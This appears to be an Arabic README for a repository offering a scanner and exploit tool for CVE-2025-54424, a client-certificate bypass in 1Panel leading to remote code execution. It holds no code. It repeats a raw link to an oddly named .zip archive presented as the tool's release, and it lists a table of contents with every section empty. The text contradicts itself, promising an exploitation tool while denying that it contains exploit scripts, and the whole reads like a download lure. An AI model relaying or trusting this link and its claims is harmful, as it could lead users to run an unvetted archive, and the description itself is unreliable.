
CVE-2025-54424: تجاوز شهادة عميل TLS في 1Panel يتيح تنفيذ الكود عن بُعد (RCE) عبر CN مزيّفة 'panel_client' باستخدام أداة فحص واستغلال مدمجة. الإصدارات المتأثرة: <= v2.0.5. 🔐
https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip
CVE-2025-54424 هي ثغرة تتعلق بـ 1Panel، وتتضمن تجاوز شهادة العميل مما قد يؤدي إلى تنفيذ أوامر عن بُعد. يوفر هذا المستودع مجموعة أدوات متكاملة تهدف إلى مساعدة الباحثين في إجراء الفحص والاختبارات التحققية لهذه الثغرة في بيئات تجريبية خاضعة للتحكم. تؤكد الأداة على الاختبار الأمني والاستخدامات التعليمية وبحوث الامتثال على الأنظمة المتأثرة. لا يوفر المشروع حمولات هجومية أو نصوص استغلال للوصول غير المصرح به أو لاستهداف الأصول الخارجية. يُرجى استخدامها في بيئات حاصلة على تفويض صريح، والالتزام بالقوانين المحلية ومتطلبات الامتثال في القطاع.
جدول المحتويات
حول هذا المستودع هذه مجموعة أدوات موجهة للباحثين ومهندسي الأمان، صُممت حول العمل البحثي الخاص بـ CVE-2025-54424. الهدف الأساسي هو توفير بيئة اختبار شفافة وقابلة لإعادة الإنتاج لتقييم نطاق التأثير، وتحديد العوامل التكوينية، وتقييم فعالية خطط الإصلاح في بيئة خاضعة للتحكم. يؤكد المشروع على عمليات الاختبار الموثقة، وسجلات النتائج القابلة للتتبع، والعمليات الحمائية للأصول.
أهداف المشروع ونطاقه
قواعد الاستخدام والأخلاقيات
نظرة عامة على الميزات
كيف يعمل (بنية عالية المستوى)
نقاط الأمان والحماية
متطلبات البيئة والتثبيت
خطوات التثبيت (مستوى عالٍ)
البدء السريع (عملية عالية المستوى)
أنماط الاستخدام وسير العمل
دليل المطورين
الاختبار وضمان الجودة
الإصدارات والنشر
تفاصيل الإصدارات والنشر
دليل المساهمة
الأسئلة الشائعة
الترخيص والتفويض
شكر وتقدير
إذا كنت بحاجة إلى الاطلاع على عناصر الإصدار المحددة والملفات التي تم تنزيلها والمزيد من أمثلة الإعدادات، يرجى زيارة الرابط التالي والاطلاع على الوثائق ذات الصلة عند الحاجة. راجع صفحة الإصدارات على https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip
ملاحظات